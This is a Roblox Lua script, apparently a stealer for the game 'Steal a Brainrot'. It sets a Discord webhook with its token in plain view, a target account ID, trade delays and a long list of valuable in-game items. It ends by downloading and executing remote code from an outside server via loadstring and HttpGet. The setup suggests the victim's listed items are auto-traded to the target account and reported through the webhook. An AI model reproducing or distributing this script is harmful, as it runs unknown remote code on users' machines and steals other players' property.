getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477776859306660062/sIFIuqnh-_Z9qAmObLaEStqOsKaaxSofvtvo7F4C458aSLgy9TzpG4PQInNMVJ8THwKV"
getgenv().TARGET_ID = 2606738563
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["1x1x1x1"] = true,
    ["25"] = true,
    ["67"] = true,
    ["Agarrini la Palini"] = true,
    ["Bacuru and Egguru"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Celularcini Viciosini"] = true,
    ["Cerberus"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Chillin Chili"] = true,
    ["Chimnino"] = true,
    ["Chipso and Queso"] = true,
    ["Cooki and Milki"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["Donkeyturbo Express"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Esok Sekolah"] = true,
    ["Eviledon"] = true,
    ["Extinct Matteo"] = true,
    ["Festive 67"] = true,
    ["Fishino Clownino"] = true,
    ["Fragola La La La"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Giftini Spyderini"] = true,
    ["Ginger Gerat"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Guest 666"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Job Job Job Sahur"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Karker Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Extinct Grande"] = true,
    ["La Food Combinasion"] = true,
    ["La Ginger Sekolah"] = true,
    ["La Grande Combinasion"] = true,
    ["La Jolly Grande"] = true,
    ["La Romantic Grande"] = true,
    ["La Sahur Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["La Spooky Grande"] = true,
    ["La Supreme Combinasion"] = true,
    ["La Taco Combinasion"] = true,
    ["Las Sis"] = true,
    ["List List List Sahur"] = true,
    ["Los 25"] = true,
    ["Los 67"] = true,
    ["Los Amigos"] = true,
    ["Los Bros"] = true,
    ["Los Candies"] = true,
    ["Los Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Los Mobilis"] = true,
    ["Los Planitos"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Sekolahs"] = true,
    ["Los Spaghettis"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Sweethearts"] = true,
    ["Los Tacoritas"] = true,
    ["Love Love Bear"] = true,
    ["Lovin Rose"] = true,
    ["Mariachi Corazoni"] = true,
    ["Meowl"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Money Money Puggy"] = true,
    ["Money Money Reindeer"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Heart"] = true,
    ["Noo my Present"] = true,
    ["Noo my examine"] = true,
    ["Nooo My Hotspot"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Orcaledon"] = true,
    ["Perrito Burrito"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Rang Ring Bus"] = true,
    ["Reinito Sleighito"] = true,
    ["Rosetti Tualetti"] = true,
    ["Rosey and Teddy"] = true,
    ["Sammyni Fattini"] = true,
    ["Santa Hotspot"] = true,
    ["Skibidi Toilet"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Spinny Hammy"] = true,
    ["Spooky and Pumpky"] = true,
    ["Strawberry Elephant"] = true,
    ["Swag Soda"] = true,
    ["Swaggy Bros"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Tang Tang Keletang"] = true,
    ["Telemorte"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["Tuff Toucan"] = true,
    ["W or L"] = true,
    ["Yess my examine"] = true
}
loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/22af93ab693db02daf53289254172c2b7e2fbd0bf0698431468cc16f59172c15/download"))()
